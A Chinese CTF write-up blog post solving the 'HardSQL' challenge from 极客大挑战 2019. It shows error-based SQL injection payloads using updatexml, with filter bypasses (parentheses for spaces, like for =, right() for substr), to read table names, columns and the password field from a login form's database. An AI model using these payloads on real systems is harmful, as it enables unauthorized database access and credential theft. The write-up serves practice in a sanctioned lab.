[极客大挑战 2019]HardSQL

最新推荐文章于 2024-05-04 17:16:12 发布
最新推荐文章于 2024-05-04 17:16:12 发布
阅读量368 收藏 3
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46133275/article/details/132026703
版权

文章目录

前言

本文主要记录[极客大挑战 2019]HardSQL的解题过程和相关思路

[极客大挑战 2019]HardSQL

打开题目看到登录框,先尝试用'判断类型,发现回显了错误信息告知是数据库为MariaDB,存在字符型注入
在这里插入图片描述
尝试使用#闭合,看起来是闭合成功了,不过为什么还是提示我输入username和password?
在这里插入图片描述
于是我尝试username=123&password=123,发现提示用户名密码错误,那就是说上面Input your username and password并不是登陆失败的提示,而是存在某种检测,另外给出的提示
在这里插入图片描述
那么我就用bp跑了一下字典,看看是检测了哪些内容
检测到#,则返回Input your username and password
在这里插入图片描述
检测到=/**/byunion等都会有提示你可别被我逮住了,臭弟弟
在这里插入图片描述
不过呢,因为一开始可以看到报错信息,又加上没有检测updatexmlextractvalue等报错函数,可以考虑使用报错注入,这里就采用updatexml来尝试报错注入
在这里插入图片描述
尝试使用?username=1' or updatexml(1,concat(0x7e,database()),1))%23&password=1不过发现还是被检测到了
在这里插入图片描述
很奇怪,明明orupdatexml%23等这些都没有被过滤,为什么还是被检测到了,后来把空格去掉才看出来,原来空格也被过滤了
在这里插入图片描述
那么在空格被过滤,内联注释被过滤的情况下,可以采用来进行代替以绕过检测,查找当前数据库
?username=1'or(updatexml(1,concat(0x7e,database()),1))%23&password=1
在这里插入图片描述
=被过滤的情况下可以使用like进行替换,查找当前数据库中的所有表名
?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))),1))%23&password=1
在这里插入图片描述
虽然and被过滤了,但是由于geek数据库中只有H4rDsq1一张表,所以不用担心被其他表的列名所混淆
?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like('geek'))),1))%23&password=1
也可以使用如下payload
?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1))%23&password=1
在这里插入图片描述
继续获取username和password,发现获取password的时候其值只显示了一部分
在这里插入图片描述
substr函数被过滤了,这时可以考虑使用right函数
在这里插入图片描述
在这里插入图片描述

根据重复部分拼接得到flag

Ba22ett
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
非常经典的一道SQL报错注入题目[极客挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 1236
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
[极客挑战 2019]HardSQL 1
最新发布
qq_44724114的博客
05-04 466
右键选择send to intruder——选择爆破点(这里我只选了password为爆破点)选择已经准备好的字典,下面的字典不全,但也勉强能用。我这里Length 如果是784的就不能跑 799的可以;具体的可以看Response的提示来判断。
BUUCTF [web专项25][极客挑战 2019]HardSQL
yanglinchiji的博客
11-05 233
right(password,32) (可以换成30,因为后面还有个}和~,32只是因为没有影响就没改)尝试报错注入(datexml和extractvalue两种,但是我看别人的wp都有,挺全的)那就用^代替and,用()代替空格,like代替等于号(如果还有需要代替的后面再说)发现这次过滤的很全,万能密码没有一个可以使用。经过测试,至少and,空格,等于 等被过滤。我们可以用right函数来获取后面的字符。发现只有一半,因为只能输出32字符。老常客了,进入后先用万能密码试试。拼凑即可获得flag。
报错注入 [极客挑战 2019]HardSQL1
m0_75178803的博客
11-21 813
而第二个参数xpath_string(xpath格式的字符串),我们在注入的时候把第二个参数变为非xpath格式自然会报错。或者1'^(updatexml(1,concat(0x7e,database(),0x7e),1))#①or是或运算,A or B的结果:当A、B中只要有一个或者两个都为1时,结果为1,否则为0;②xor是异或运算,A xor B的结果:当A、B两个不同时结果为1,否则为0。因为我们在上面的尝试中发现and,union,空格是被过滤的。输入1' and 1=2 #
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
Buuctf:[极客挑战 2019]HardSQL
fcz___的博客
03-12 262
payload:用户名:1’^(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#密码:1。可以看到,or, by, and union 等都过滤了。好我们先记下这半边,查一下又半边再接上就行了。好家伙,又是他.这次他又有能耐了。我们先试试万能能密码。我们跑个fuzz看看过滤了啥。
极客挑战2019Hard SQL注入解题
Bird&Bird
10-26 1259
1、打开BUUCTF在线评测,选择web----->【极客挑战2019HardSQL。 2、首先使用万能密码试一下,报错了。 3、普通方式union select注入,报同样错误 4、双写绕过试一下,还是报同样错误。 5、 那使用报错注入试一下吧。但其过滤了空格和=号,不过我们可以使用()代替空格,like代替=号。 爆库名 username=admin&password=123456'^extractvalue(1,concat(0x5c,(select(data.
BUUCTF之[极客挑战 2019]HardSQL ----报错注入extractvalue和updatexml
weixin_44632787的博客
07-27 547
BUUCTF之[极客挑战 2019]HardSQL ----报错注入extractvalue和updatexml 题目 经过手工测试可以发现过滤:and,/**/,空格,等于号(=),大于号(>)和联合查询union等多个关键词 一般来说,SQL注入有这4个步骤: 爆数据库:select database() 爆数据表:select group_concat(table_name) from information_schema.tables where table_schema=databas
BUUCTF之HardSQL[极客挑战 2019]
金 帛的博客
06-06 1266
buucft记录贴
极客挑战2019Hardsql
uuzfumo的博客
11-06 369
SQL注入报错注入类型的相关题目,涉及一部分的绕过知识
BUUCTF [极客挑战 2019]HardSQL
m0_63253040的博客
03-28 2394
还是这个熟悉的登录页面 尝试万能密码登录,发现有过滤,一个一个试 过滤了空格,=,等等许多,双写也无法绕过,那么换报错注入试试
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值